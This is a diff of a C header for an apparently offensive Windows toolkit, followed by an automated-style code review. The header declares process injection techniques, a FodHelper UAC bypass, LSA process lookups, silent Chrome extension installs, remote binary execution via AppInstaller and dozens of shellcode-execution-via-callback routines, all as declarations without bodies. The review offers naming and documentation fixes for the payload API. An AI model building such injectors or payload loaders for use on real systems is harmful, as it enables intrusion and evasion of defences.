DWORD TargetPid
|
||||
specify target process
|
||||
[OPTIONAL] DWORD ThreadId
|
||||
specify target process thread id (depends PROCESS_INJECTION_METHOD)
|
||||
[OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
|
||||
path to DLL to load (depends PROCESS_INJECTION_METHOD)
|
||||
|
||||
|
||||
example:
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
|
||||
Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
|
||||
Pii.ThreadId = 0; //not required for this method
|
||||
Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
|
||||
|
||||
*/
|
||||
|
||||
typedef enum PROCESS_INJECTION_METHOD {
|
||||
E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
|
||||
E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
|
||||
E_CTRL_INJECT, //2
|
||||
E_QUEUE_USER_APC //3
|
||||
}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
|
||||
|
||||
typedef struct __PROCESS_INJECTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
DWORD ProcessId;
|
||||
DWORD ThreadId;
|
||||
PWCHAR PathToFile;
|
||||
}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -354,18 +241,45 @@ BOOL UacBypassFodHelperMethodW(_In_ PWCHAR PathToBinaryToExecute, _Inout_ PPROCE
|
|||
DWORD MpfGetLsaPidFromRegistry(VOID);
|
||||
DWORD MpfGetLsaPidFromServiceManager(VOID);
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID);
|
||||
BOOL ShellcodeExecutionViaFunctionCallbackMain(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
DWORD MpfComMonitorChromeSessionOnce(VOID);
|
||||
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
|
||||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
|
||||
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
|
||||
|
||||
BOOL MpfPiWriteProcessMemoryCreateRemoteThread(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
|
||||
BOOL MpfPiQueueUserAPCViaAtomBomb(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetThreadId);
|
||||
BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _In_ DWORD TargetProcessId);
|
||||
BOOL MpfSceViaEnumChildWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCDefFolderMenu_Create2(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCertEnumSystemStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaCertEnumSystemStoreLocation(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDateFormatsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDesktopWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDesktopsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumDisplayMonitors(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumFontFamiliesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumFontsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumLanguageGroupLocalesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumObjects(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumResourceTypesExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemCodePagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemGeoID(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemLanguageGroupsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumSystemLocalesEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumThreadWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumTimeFormatsEx(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumUILanguagesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumWindowStationsW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumWindows(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaK32EnumPageFilesW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaEnumPwrSchemes(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, only triggers on certain button presses, prone to crashing
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -454,6 +368,6 @@ INT __demonstration_WinMain(VOID); //hook sleep
|
|||
/*******************************************
|
||||
GENERIC SHELLCODE PAYLOADS FOR TESTINGS
|
||||
*******************************************/
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(VOID);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(VOID);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(VOID);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
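Review bot: `MpfSceViaMessageBoxIndirectW` is declared next to the other `MpfSceVia*` routines with only a trailing comment marking it unstable and crash-prone, whereas this header already flags unstable entry points in the identifier itself (`__unstable__preview__MpfSilentInstallGoogleChromePluginW`), so a caller reading declarations or autocomplete sees no difference between it and the stable variants. Either follow the existing convention and declare it as `BOOL __unstable__preview__MpfSceViaMessageBoxIndirectW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);` or, if the name must stay, move the caveat into a comment block above the declaration that also states the call blocks until the user interacts with the dialog (the comment says it only fires on certain button presses), since an unattended caller would presumably hang there. Separately, none of the new `MpfSceVia*` declarations document what happens to `Payload`: the removed `SHELLCODE_EXECUTION_INFORMATION` block at least described its fields, and now nothing says whether the bytes are copied into a separately allocated executable region or executed in place, whether the function returns after the callback completes, or what `FALSE` distinguishes (allocation failure versus the enumeration API never invoking the callback). A one-line contract above the group such as `// Copies Payload into freshly allocated executable memory and triggers it from the named API's callback; returns FALSE if allocation or the API call fails` would let callers reason about lifetime and error handling without reading every .cpp, though the exact wording needs confirming against the implementations, which are not visible here.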
|
||||
|
|